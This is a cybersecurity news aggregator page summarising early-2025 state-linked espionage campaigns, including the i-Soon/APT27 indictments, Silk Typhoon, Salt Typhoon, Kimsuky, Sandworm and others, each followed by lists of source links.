CyberSecurity news

FlagThis - #CyberEspionage

@World - CBSNews.com //
References: bsky.app , CyberInsider , bsky.app ...
The U.S. Justice Department has indicted 12 Chinese nationals for their alleged involvement in state-linked cyber operations. The individuals include employees of the Chinese technology firm i-Soon, members of the APT27 group (also known as Emissary Panda, TG-3390, Bronze Union, and Lucky Mouse), and two officers from China's Ministry of Public Security. These indictments shed light on the hacking tools and methods allegedly employed in a global hacking scandal. The Justice Department stated that the Ministry of State Security (MSS) and Ministry of Public Security (MPS) utilized an extensive network of private companies, including i-Soon, to conduct unauthorized computer intrusions in the U.S. and elsewhere.

The U.S. DoJ charges these individuals with data theft and suppressing dissent worldwide. i-Soon, identified as one of the private companies involved, allegedly provided tools and methods to customers and hacked for the PRC (People's Republic of China). These actions highlight a significant cybersecurity concern involving state-sponsored actors and their use of private firms to conduct cyber espionage.

Recommended read:
References :
  • bsky.app: US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
  • CyberInsider: U.S. Charges 12 Chinese Nationals Over Decade-Long Cyber Espionage Campaign
  • The Cyber Express: The United States Department of Justice (DOJ) has taken action against a major cyber threat, opening indictments against 12 Chinese nationals, including two officers from China’s Ministry of Public Security (MPS) and several employees of the Chinese technology firm i-Soon.
  • bsky.app: USA accuses China's State of operating network of "hackers for hire". Accused 12 individuals, 2 officers of the PRC Ministry of Public Security (MPS), employees of a private company, Anxun Information Technology Co. Ltd, and members of APT27.
  • The Hacker News: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
  • securityaffairs.com: US DOJ charges 12 Chinese nationals for state-linked cyber operations
  • The Register - Security: Xi's freelance infosec warriors apparently paid up to $75K to crack a single American inbox US government agencies announced Wednesday criminal charges against alleged members of China's Silk Typhoon gang, plus internet domain seizures linked to a long-term Chinese espionage campaign that saw Beijing hire miscreants to compromise US government agencies and other major orgs.…
  • DataBreaches.Net: U.S. Charges 12 Chinese Contract Hackers and Law Enforcement Officers in Global Computer Intrusion Campaigns
  • bsky.app: The US Justice Department has charged Chinese state security officers and APT27 and i-Soon Chinese hackers linked to network breaches and cyberattacks targeting victims worldwide since 2011.
  • cyble.com: U.S. Indictments Shed Light on i-Soon Hacking Tools, Methods
  • Metacurity: US indicts twelve prolific Chinese hackers, including eight i-Soon staffers
  • Carly Page: The Department of Justice has announced criminal charges against 12 Chinese government-linked hackers who are accused of hacking over 100 American organizations, including the U.S. Treasury, over the course of a decade
  • Threats | CyberScoop: US indicts 12 Chinese nationals for vast espionage attack spree
  • BleepingComputer: The U.S. Justice Department has charged Chinese state security officers along with APT27 and i-Soon hackers for network breaches and cyberattacks that have targeted victims globally since 2011.
  • hackread.com: US Charges 12 in Chinese Hacker-for-Hire Network, Offers $10M Reward
  • Risky Business: US indicts the i-Soon and APT27 hackers, the BADBOX botnet gets disrupted again,authorities seize the Garantex crypto exchange, and the FBI arrests hackers who stole Taylor Swift concert tickets.
  • Security | TechRepublic: Targets included the U.S. Treasury Department, journalists, and religious organisations, and the attacks intended to steal data and suppress free speech.
  • techxplore.com: US indicts 12 Chinese nationals in hacking
  • : US Charges Members of Chinese Hacker-for-Hire Group i-Soon
  • Matthias Schulze: U.S. Charges 12 Chinese Nationals in State-Backed Hacking Operations
  • WIRED: US Charges 12 Alleged Spies in China’s Freewheeling Hacker-for-Hire Ecosystem

Pierluigi Paganini@Security Affairs //
The Chinese espionage group Silk Typhoon is expanding its cyberattacks to target the global IT supply chain. Microsoft has warned that this group, backed by the Chinese state, has shifted its tactics to focus on remote management tools and cloud services. These supply chain attacks provide access to downstream customers, enabling the group to move laterally within networks and compromise various organizations.

US government agencies have announced criminal charges against alleged members of the Silk Typhoon gang, along with the seizure of internet domains linked to their long-term espionage campaign. The group is accused of compromising US government agencies and other major organizations. The Justice Department has stated that the Chinese government, including its Ministries of State and Public Security, has encouraged and supported private contractors and technology companies to hack and steal information, providing a form of plausible deniability.

Recommended read:
References :
  • bsky.app: Microsoft warns that Chinese cyber-espionage threat group 'Silk Typhoon' has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • The Register - Security: They're good at zero-day exploits, too Silk Typhoon, the Chinese government crew believed to be behind the December US Treasury intrusions, has been abusing stolen API keys and cloud credentials in ongoing attacks targeting IT companies and state and local government agencies since late 2024, according to Microsoft Threat Intelligence.
  • BleepingComputer: Microsoft warns that Chinese cyber-espionage threat group 'Silk Typhoon' has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • bsky.app: Microsoft warns that Chinese cyber-espionage threat group 'Silk Typhoon' has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • securityaffairs.com: Microsoft warns that China-backed APT Silk Typhoon linked to US Treasury hack, is now targeting global IT supply chains, using IT firms to spy and move laterally.
  • cyberinsider.com: Microsoft Threat Intelligence has identified a shift in tactics by Silk Typhoon, a Chinese state-sponsored cyber-espionage group, which is now targeting IT supply chain providers, including remote management tools and cloud applications.
  • Information Security Buzz: China-linked APT Silk Typhoon targets IT Supply Chain
  • The Hacker News: China-Linked Silk Typhoon Expands Cyber Attacks to IT Supply Chains for Initial Access
  • thecyberexpress.com: The Chinese espionage group known as Silk Typhoon has expanded the cyberattacks to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group’s tactics, highlighting a new focus on commonly used IT solutions such as remote management tools and cloud applications.
  • gbhackers.com: Microsoft Warns Silk Typhoon Hackers Exploit Cloud Services to Attack IT Supply Chain
  • Cyber Security News: Microsoft Warns Silk Typhoon Hackers Exploit Cloud Services to Attack IT Supply Chain
  • The Register - Security: Feds name and charge alleged Silk Typhoon spies behind years of China-on-US attacks
  • Virus Bulletin: Microsoft Threat Intelligence has identified a shift in tactics used by Silk Typhoon. The espionage group is now targeting common IT solutions like remote management tools and cloud applications to gain initial access.
  • Source: Silk Typhoon targeting IT supply chain
  • www.scworld.com: Google's Threat Intelligence Group report on Silk Typhoon's new tactic highlights the group's shift towards IT supply chain attacks.
  • Threats | CyberScoop: Silk Typhoon shifted to specifically targeting IT management companies
  • Vulnerable U: Microsoft Details Silk Typhoon’s IT Supply Chain Attacks
  • bsky.app: Microsoft warns that Chinese cyber-espionage threat group "Silk Typhoon" has shifted its tactics, now targeting remote management tools and cloud services in supply chain attacks that give them access to downstream customers.
  • : Microsoft warns that Chinese espionage group Silk Typhoon is increasingly exploiting common IT solutions to infiltrate networks and exfiltrate data.
  • securityonline.info: Zero-Day Attacks & Stolen Keys: Silk Typhoon Breaches Networks
  • Security Risk Advisors: Chinese Silk Typhoon threat actor targets global IT supply chains. Consider patching vulnerabilities, enforce MFA, audit cloud access. #CyberThreat #CloudSecurity

@gbhackers.com //
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.

If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

Recommended read:
References :
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
  • The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns.
  • : Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
  • www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
  • www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
  • www.scworld.com: PowerShell exploited in new Kimsuky intrusions
  • Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
  • The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
  • MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
  • securityaffairs.com: Analyzing DEEP#DRIVE: North Korean

@cyberscoop.com //
The Chinese nation-state hacking group Salt Typhoon, despite facing US sanctions, continues to actively target telecommunications providers. Between December 2024 and January 2025, Recorded Future observed Salt Typhoon breaching five telecom firms, including a US-based affiliate of a UK telecom provider, a US internet service provider, and companies in Italy, South Africa, and Thailand. The group also performed reconnaissance on a Myanmar-based telecom provider.

Salt Typhoon exploited vulnerabilities in Cisco IOS XE software, specifically CVE-2023-20198 and CVE-2023-20273, to compromise unpatched Cisco devices. They attempted to compromise over 1,000 Cisco routers globally, focusing on those within telecom networks. Additionally, Salt Typhoon targeted universities, including the University of California and Utah Tech, potentially seeking access to research related to telecommunications and engineering.

Recommended read:
References :
  • cyberscoop.com: Salt Typhoon remains active, hits more telecom networks via Cisco routers
  • The Register - Security: More victims of China's Salt Typhoon crew emerge: Telcos just now hit via Cisco bugs
  • Carly Page: The China-backed Salt Typhoon group is still hacking telecommunications providers, despite government sanctions. Recorded Future says Salt Typhoon breached five firms between December and January, including a US affiliate of a prominent UK provider and a US-based ISP
  • techcrunch.com: The China-backed Salt Typhoon group is still hacking telecommunications providers, despite government sanctions.
  • www.wired.com: Wired's coverage of Salt Typhoon's ongoing hacking activities.
  • Threats | CyberScoop: Salt Typhoon remains active, hits more telecom networks via Cisco routers
  • cyberinsider.com: Chinese Hackers Breach Cisco Devices in Global Telecom Attacks
  • securebulletin.com: RedMike (Salt Typhoon) continues global Telecom attacks
  • CyberInsider: Chinese Hackers Breach Cisco Devices in Global Telecom Attacks
  • Secure Bulletin: Report on RedMike's continued attacks on telecom providers.
  • Talkback Resources: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks [exp] [net]
  • Talkback Resources: Chinese state-sponsored APT group Salt Typhoon targets telecommunications providers and universities by exploiting Cisco vulnerabilities, creating privileged accounts, bypassing firewalls, and exfiltrating data using GRE tunnels, prompting organizations to patch devices, enforce access controls, and monitor for unauthorized changes.
  • Talkback Resources: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks
  • PCMag UK security: China's Salt Typhoon Spies Are Still Eavesdropping on Global Networks
  • ciso2ciso.com: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks
  • ciso2ciso.com: Salt Typhoon Targeting Old Cisco Vulnerabilities in Fresh Telecom Hacks – Source: www.securityweek.com
  • securityaffairs.com: China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws
  • securityaffairs.com: China-linked APT Salt Typhoon breached telecoms by exploiting Cisco router flaws
  • BleepingComputer: China's Salt Typhoon hackers are still actively targeting telecoms worldwide and have breached more U.S. telecommunications providers via unpatched Cisco IOS XE network devices.
  • industrialcyber.co: Insikt Group details RedMike cyber espionage campaign on telecom providers using Cisco vulnerabilities
  • securityonline.info: Cybersecurity researchers at Insikt Group have identified an ongoing cyber espionage campaign by RedMike (also tracked as Salt Typhoon).
  • Industrial Cyber: Insikt Group details RedMike cyber espionage campaign on telecom providers using Cisco vulnerabilities
  • SecureWorld News: Salt Typhoon Expands Espionage Campaign, Targets Cisco Routers
  • Cisco Talos Blog: Weathering the storm: In the midst of a Typhoon
  • cyberscoop.com: Cisco Talos observed the campaign targeting major U.S. telecommunication companies and observed the attackers primarily used legitimate login credentials to gain initial access, making detection and prevention difficult.
  • cyberscoop.com: Salt Typhoon gained initial access to telecoms through Cisco devices
  • securityaffairs.com: Salt Typhoon used custom malware JumbledPath to spy U.S. telecom providers

Ridhika Singh@cysecurity.news //
A sophisticated cyber espionage campaign, dubbed UNK_CraftyCamel, is actively targeting aviation and satellite organizations in the United Arab Emirates (UAE). Cybersecurity researchers at Proofpoint discovered this attack in October 2024. The attackers are employing advanced techniques, including the use of polyglot files, a custom Go-based backdoor known as Sosano, and compromised business accounts, to evade detection. This highly targeted campaign leverages compromised business relationships and tailored lures to deliver a multi-stage infection chain.

The attack begins with phishing emails sent from the compromised account of an Indian electronics company, INDIC Electronics. These emails contain links to malicious ZIP files hosted on domains designed to mimic legitimate companies. The ZIP archives contain cleverly disguised malware components using polyglot files, a relatively rare technique in espionage operations. These files are structured so they can be interpreted as multiple file formats, allowing attackers to hide malicious content within seemingly legitimate files, making detection more difficult. The use of polyglot files demonstrates an advanced adversary with a focus on stealth and obfuscation.

Once executed, the polyglot malware installs Sosano, a custom Go-based backdoor designed for stealth and resilience. Sosano establishes a connection with a command-and-control server and waits for commands, which include listing directories, executing shell commands, and downloading additional payloads. While some tactics overlap with known Iranian-aligned threat actors, researchers have not definitively linked this activity to any previously identified group. The attackers’ focus on aviation and satellite communications in the UAE suggests a strategic intelligence-gathering motive.

Recommended read:
References :
  • Cyber Security News: Hackers Exploit Business Relationships to Attack Arab Emirates Aviation Sector
  • gbhackers.com: Hackers Exploiting Business Relationships to Attack Arab Emirates Aviation Sector
  • The Record: Proofpoint researchers say they spotted new backdoor malware that suspected Iranian regime-backed hackers have aimed at sectors such as aviation, satellite communications and critical transportation infrastructure in the United Arab Emirates.
  • Information Security Buzz: Highly Targeted Cyber Espionage Campaign Targeting UAE Aviation Sector
  • thehackernews.com: Suspected Iranian Hackers Used Compromised Indian Firm's Email to Target U.A.E. Aviation Sector
  • Virus Bulletin: Proofpoint researchers identified a highly targeted email-based campaign targeting UAE organizations. The malicious messages were sent from a compromised entity in a trusted business relationship with the targets, and used lures customized to every target.
  • www.cysecurity.news: A highly targeted cyber espionage campaign, dubbed UNK_CraftyCamel, is targeting aviation and satellite organizations in the UAE. Attackers use polyglot files, a custom Go-based backdoor (Sosano), and compromised business accounts to evade detection.
  • Vulnerable U: Highly Targeted Polyglot Malware Campaign Hits UAE Aviation and Satellite Firms
  • Industrial Cyber: Proofpoint details likely Iranian-backed Sosano malware targeting UAE’s critical sectors
  • : New Cyber-Espionage Campaign Targets UAE Aviation and Transport
  • www.scworld.com: New Sosano malware attacks target UAE
  • securityonline.info: UNK_CraftyCamel: New Threat Group Using Polyglot Malware in UAE
  • securityaffairs.com: A new cyber espionage campaign is targeting UAE aviation and satellite companies. Researchers have identified a custom Go-based backdoor, Sosano, being used in this operation.
  • www.redpacketsecurity.com: Researchers have identified a new cyber-espionage campaign targeting aviation and satellite organizations in the UAE.

info@thehackernews.com (The@The Hacker News //
A new cyber espionage campaign, attributed to the Belarus-aligned threat actor Ghostwriter, is targeting opposition activists in Belarus and Ukrainian military and government organizations. The campaign leverages malware-laced Microsoft Excel documents as lures to deliver a new variant of PicassoLoader. Ghostwriter, also known as Moonscape, TA445, UAC-0057, and UNC1151, has been active since 2016 and is known to align with Russian security interests, promoting narratives critical of NATO.

The attack chain begins with a Google Drive shared document hosting a RAR archive containing a malicious Excel workbook. When opened, the workbook triggers the execution of an obfuscated macro, paving the way for a simplified version of PicassoLoader. While a decoy Excel file is displayed to the victim, additional payloads are downloaded onto the system. Techniques like steganography, hiding malicious code within seemingly harmless JPG images, are also used to retrieve second-stage malware from remote URLs. SentinelOne has observed Ghostwriter repeatedly using Excel workbooks with Macropack-obfuscated VBA macros and embedded .NET downloaders, highlighting a persistent cyberespionage operation against Ukrainian targets.

Recommended read:
References :
  • bsky.app: After many reports on Ghostwriter's info-ops, SentinelOne has seen the group returning to malware delivery, this time with a campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations
  • Talkback Resources: Ghostwriter | New Campaign Targets Ukrainian Government and Belarusian Opposition
  • The Hacker News: Belarus-Linked Ghostwriter Uses Macropack-Obfuscated Excel Macros to Deploy Malware
  • Talkback Resources: Talkback post on Excel Macros to Deploy Malware
  • Anonymous ???????? :af:: A new malware campaign targets Belarusian activists and the Ukrainian military, using Excel files to deliver PicassoLoader.
  • Virus Bulletin: SentinelLABS researcher Tom Hegel writes about an extension of the long-running Ghostwriter campaign targeting opposition activists in Belarus as well as Ukrainian military and government organizations with weaponized Excel documents lures.
  • Information Security Buzz: Cybersecurity researchers at SentinelLABS have uncovered a new campaign linked to the long-running Ghostwriter operation, targeting Belarusian opposition activists and Ukrainian military and government entities. 
  • gbhackers.com: Ghostwriter Malware Targets Government Organizations with Weaponized XLS File
  • securityaffairs.com: New Ghostwriter campaign targets Ukrainian Government and opposition activists in Belarus
  • Know Your Adversary: 058. Hunting for Ghostwriter
  • Cyber Security News: Ghostwriter Malware Attacks Government Organizations Using Weaponized XLS File

Arda Büyükkaya@EclecticIQ Blog //
The Russian Sandworm group, a cyber-espionage unit with ties to the Russian military, is actively targeting Windows users in Ukraine. They are distributing malicious Microsoft Key Management Service (KMS) activators and fake Windows updates, compromising systems in the process. This campaign, which likely started in late 2023, showcases the ongoing cyber warfare efforts targeting Ukraine.

EclecticIQ threat analysts have linked these attacks to Sandworm based on overlapping infrastructure, consistent tactics, techniques, and procedures (TTPs), and the use of ProtonMail accounts to register domains used in the attacks. The attackers are also deploying a BACKORDER loader to deliver DarkCrystal RAT (DcRAT) malware. This malicious tool abuses legitimate Windows processes to evade detection, such as using `wmic` to add Microsoft Defender exclusions and `reg` to gather information about Defender's status, mimicking the behavior of legitimate KMS activators, while injecting malicious payloads onto compromised systems.

Recommended read:
References :
  • bsky.app: The Sandworm Russian military cyber-espionage group is targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
  • BleepingComputer: Sandworm Russian military cyber-espionage group is targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
  • www.bleepingcomputer.com: Russian military hackers deploy malicious Windows activators in Ukraine
  • Know Your Adversary: EclecticIQ analysts presented a report on recent Sandworm campaign, where the threat actors used trojanized Microsoft KMS activation tools to deliver BACKORDER loader.
  • EclecticIQ Blog: Sandworm APT Targets Ukrainian Users With Trojanized Microsoft KMS Activation Tools In Cyber Espionage Campaigns
  • Anonymous ???????? :af:: Details about the malicious Microsoft KMS activation tools used in a recent Sandworm campaign.
  • MSSP feed for Latest: Reports that attacks involving malicious Microsoft Key Management Service activators and bogus Windows updates have been deployed.
  • securityaffairs.com: Report highlights that a Sandworm subgroup exploited trojanized Microsoft KMS activation tools.
  • ciso2ciso.com: Source: socprime.com – Author: Daryna Olyniychuk For over a decade, russia-backed Sandworm APT group (also tracked as UAC-0145, APT44) has consistently targeted Ukrainian organizations, with a primary focus on state bodies and critical infrastructure.
  • www.microsoft.com: Details of the BadPilot operation conducted by the Sandworm subgroup, targeting critical organizations and governments.
  • ciso2ciso.com: Sandworm APT Attacks Detection: russian State-Sponsored Hackers Deploy Malicious Windows KMS Activators to Target Ukraine – Source: socprime.com
  • securityonline.info: Discussion of the campaign, the methods used by the attackers and potential consequences.
  • BleepingComputer: A subgroup of the Russian state-sponsored hacking group APT44, also known as 'Seashell Blizzard' and 'Sandworm', has been targeting critical organizations and governments in a multi-year campaign dubbed 'BadPilot.'
  • : Microsoft : Microsoft Threat Intelligence reports on a subgroup within Russian APT Seashell Blizzard (aka Sandworm, APT44) and their multiyear [sic] initial access operation (tracked as the "BadPilot campaign"). This blog details this subgroup's recently observed tactics, techniques, and procedures (TTPs), and describes three of its distinct exploitation patterns. The geographical targeting to a near-global scale of this campaign expands Seashell Blizzard's scope of operations beyond Eastern Europe. Additionally, the opportunistic access methods outlined in this campaign will continue to offer Russia opportunities for niche operations and activities. Indicators of compromise and Yara rules are listed.
  • socprime.com: Sandworm APT Attacks Detection: russian State-Sponsored Hackers Deploy Malicious Windows KMS Activators to Target Ukraine
  • securityaffairs.com: Microsoft Threat Intelligence has published research on a subgroup of the Russia-linked APT group Seashell Blizzard behind the global BadPilot campaign, which compromises infrastructure to support Russian cyber operations. Seashell Blizzard (aka Sandworm, BlackEnergy and TeleBots) has been active in the cybersecurity arena for more than a decade.

Pierluigi Paganini@securityaffairs.com //
The Belgian federal prosecutor's office is currently investigating a significant data breach of its state security service (VSSE), allegedly perpetrated by Chinese government hackers. The breach, which targeted the VSSE's external mail server, occurred between 2021 and 2023 and exploited a vulnerability in Barracuda's Email Security Gateway Appliance. This incident is considered a severe security lapse and has prompted a formal inquiry by Belgian authorities.

Approximately 10% of the VSSE's staff emails were stolen during the two-year period. While classified data remained secure, the personal information of nearly half the Belgian service's members may have been compromised, the newspaper reported.

The Chinese Embassy in Belgium has dismissed the allegations as "false information".

Recommended read:
References :
  • DataBreaches.Net: Belgian prosecutor probes alleged Chinese hacking of intelligence service
  • gbhackers.com: Chinese Hackers Breach Belgium State Security Service as Investigation Continues
  • Carly Page: The Belgian federal prosecutor's office confirmed to TechCrunch on Friday that it is investigating an alleged data breach of its state security service (VSSE) by Chinese government hackers. The hackers reportedly exploited a Barracuda ESG vulnerability to access VSSE’s external mail server between 2021 and 2023
  • securityaffairs.com: China-linked threat actors stole 10% of Belgian State Security Service (VSSE)’s staff emails
  • The420.in: China’s Cyber Espionage Skyrockets: 150% Surge in Attacks Uncovered
  • securityaffairs.com: Belgian authorities are investigating Chinese hackers for breaching its State Security Service (VSSE), stealing 10% of emails from 2021 to May 2023.

Pierluigi Paganini@securityaffairs.com //
Russian state-aligned hackers are exploiting the "Linked Devices" feature in Signal Messenger to conduct cyber-espionage campaigns. Google's Threat Intelligence Group (GTIG) has uncovered these campaigns, revealing that the hackers are using phishing tactics to gain unauthorized access to Signal accounts. These campaigns involve tricking users into linking their devices to systems controlled by the attackers.

Russian threat actors are launching phishing campaigns that exploit the legitimate "Linked Devices" feature in the Signal messaging app to gain unauthorized access to accounts of interest. The hackers employ sophisticated methods to trick targets into linking their Signal account to a device controlled by the attacker, compromising their secure communications.

Recommended read:
References :
  • cyberinsider.com: Russian Hackers Exploit Signal’s Linked Devices to Spy on Users
  • BleepingComputer: Russian threat actors have been launching phishing campaigns that exploit the legitimate "Linked Devices" feature in the Signal messaging app to gain unauthorized access to accounts of interest.
  • www.bleepingcomputer.com: Russian threat actors have been launching phishing campaigns that exploit the legitimate "Linked Devices" feature in the Signal messaging app to gain unauthorized access to accounts of interest.
  • CyberInsider: Google's Threat Intelligence Group (GTIG) has uncovered a series of cyber-espionage campaigns by Russian state-aligned hackers targeting Signal Messenger accounts.
  • securebulletin.com: Russia-Aligned actors intensify targeting of Signal Messenger
  • securityaffairs.com: Russia-linked threat actors exploit Signal messenger
  • Talkback Resources: Russian Groups Target Signal Messenger in Spy Campaign [app] [social]
  • cloud.google.com: Russian Threat Actors targeting Signal messenger accounts used by individuals of interest to Russia's intelligence services. The goal seems to be espionage or military reconnaissance in context of war in Ukraine.
  • bsky.app: Russian Threat Actors targeting Signal messenger accounts used by individuals of interest to Russia's intelligence services. The goal seems to be espionage or military reconnaissance in context of war in Ukraine. https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger
  • cyble.com: Russia-Linked Actors Exploiting Signal Messenger’s “Linked Devicesâ€� Feature for Espionage in Ukraine
  • Talkback Resources: State-aligned threat actors, particularly from Russia, are targeting Signal Messenger accounts through phishing campaigns to access sensitive government and military communications, exploiting the app's "linked devices" feature for eavesdropping on secure conversations.
  • cyberscoop.com: Russian-aligned threat groups dupe Ukrainian targets via Signal
  • Talkback Resources: Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger [social]
  • Threats | CyberScoop: Russia-aligned threat groups dupe Ukrainian targets via Signal
  • www.onfocus.com: Google Threats on Signals of Trouble
  • cyberriskleaders.com: Russian Hackers Targeting Ukrainian Signal Users with Malicious QR Codes
  • arstechnica.com: Russia-aligned hackers are targeting Signal users with device-linking QR codes Swapping QR codes in group invites and artillery targeting are latest ploys.
  • MeatMutts: Google Warns of Russian Hacking Campaign Targeting Ukraine’s Military on Signal
  • Talkback Resources: Hackers Exploit Signal's Linked Devices Feature to Hijack Accounts via Malicious QR Codes
  • thecyberexpress.com: Russian state-sponsored hackers are ramping up efforts to compromise Signal messenger accounts, particularly those used by Ukrainian military personnel, government officials, and other key figures.

info@thehackernews.com (The Hacker News)@The Hacker News //
The Winnti Group, a China-based threat actor also known as APT41, is actively targeting Japanese organizations within the manufacturing, materials, and energy sectors. Researchers at LAC's Cyber Emergency Center identified a new campaign dubbed "RevivalStone," which employs an advanced version of the Winnti malware. This updated malware exhibits enhanced capabilities and sophisticated evasion techniques, posing a significant threat to the targeted industries.

This RevivalStone campaign initiates by exploiting SQL injection vulnerabilities in web-facing Enterprise Resource Planning (ERP) systems. Attackers deploy web shells like China Chopper to gain initial access, enabling reconnaissance, credential harvesting, and lateral movement within targeted networks. The updated Winnti malware variant features AES and ChaCha20 encryption, device-specific decryption keys using IP and MAC addresses, a kernel-level rootkit for covert data exfiltration, and code obfuscation to evade endpoint detection and response (EDR) systems.

Recommended read:
References :
  • www.lac.co.jp: Researchers from LAC's Cyber Emergency Center analyze the "RevivalStone" campaign operated by China-based threat group Winnti
  • cyberpress.org: Winnti Hackers Target Japanese Organizations with Advanced Malware
  • Talkback Resources: The content provides an in-depth analysis of the Winnti Group's activities, including the RevivalStone campaign, tools used such as WinntiWebShell and China Chopper, and techniques like AES encryption, Winnti RAT, and Winnti Rootkit, with a focus on detection and prevention strategies.
  • Virus Bulletin: Researchers from LAC's Cyber ​​Emergency Center analyse the "RevivalStone" campaign operated by China-based threat group Winnti
  • securityaffairs.com: SecurityAffairs: China-linked APT group Winnti targets Japanese organizations since March 2024
  • The Hacker News: Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
  • Talkback Resources: China-linked APT group Winnti targeted Japanese organizations
  • Talkback Resources: Winnti APT41 Targets Japanese Firms in RevivalStone Cyber Espionage Campaign
  • www.scworld.com: Winnti attacks set sights on Japan

Pierluigi Paganini@securityaffairs.com //
Espionage tools typically associated with China-linked threat actors have been detected in a November 2024 RA World ransomware attack against an Asian software and services firm. According to reports, the attackers initially focused on cyberespionage, targeting a Southeastern European country's foreign ministry in July 2024 before setting their sights on the Asian firm. The compromise of the software company involved exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials.

The attackers deployed a distinct toolset in the RA World attack which has previously been used by China-linked actors in classic espionage attacks, including a PlugX malware variant. The use of these tools, historically deployed for maintaining a persistent presence on targeted organizations and installing backdoors, marks a shift from traditional espionage activities focused on information gathering to financially motivated cybercrime, raising questions about whether espionage actors are diversifying their operations.

Recommended read:
References :
  • Information Security Buzz: Espionage actors linked to China may be diversifying their operations, as new evidence points to the use of espionage tools in a recent ransomware attack against a South Asian software and services company.
  • securityaffairs.com: A November 2024 RA World ransomware attack on an Asian software firm used a tool linked to China-linked threat actors.
  • www.scworld.com: After initially focusing on cyberespionage in an attack against a Southeastern European country's foreign ministry in July, threat actors aimed to compromise the Asian firm by exploiting a Palo Alto Networks PAN-OS flaw and pilfering Amazon AWS S3 bucket data and credentials before launching RA World ransomware.
  • Broadcom Software Blogs: Chinese state-sponsored hacking tools detected in recent RA World #ransomware attack. Possible moonlighting activity combines #APT and criminal tactics.

@Talkback Resources //
Cybersecurity researchers have unveiled advanced obfuscation tactics employed by APT28, a Russian state-sponsored threat actor, in their HTA Trojan. The investigation focuses on espionage campaigns targeting Central Asia and Kazakhstan diplomatic relations, revealing intricate multi-layer obfuscation strategies designed to evade detection. The analysis highlights the use of Microsoft’s VBE technique within HTA files as a core component of APT28’s malware delivery mechanism. This encoding method, facilitated by the Windows Script Encoder, transforms VBScript and JavaScript files into obfuscated formats that remain executable while concealing their true functionality.

The investigation uncovered that the malware leverages Windows’ vbscript.dll to generate embedded strings dynamically during execution. By analyzing these strings and their interaction with memory addresses, researchers were able to reconstruct the original VBScript payload hidden within the HTA file. Using publicly available tools like “vbe-decoder.py,” they successfully deobfuscated the encoded scripts, exposing the final malicious payload designed for espionage activities. This discovery underscores the need for robust malware analysis capabilities and proactive threat intelligence sharing within the cybersecurity community.

Recommended read:
References :
  • Virus Bulletin: Cisco Talos researcher Joey Chen describes how Lotus Blossom uses Sagerunex and other hacking tools for post-compromise activities. The espionage operation targets government, manufacturing, telecommunications & media organizations from Philippines, Vietnam, Hong Kong & Taiwan.
  • gbhackers.com: Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications
  • Talkback Resources: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools
  • www.cysecurity.news: Cisco Talos Uncovers Lotus Blossom’s Multi-Campaign Cyber Espionage Operations
  • Cyber Security News: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics in Detail
  • gbhackers.com: Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics
  • securityaffairs.com: Chinese Lotus Blossom APT targets multiple sectors with Sagerunex backdoor

Veronika Telychko@SOC Prime Blog //
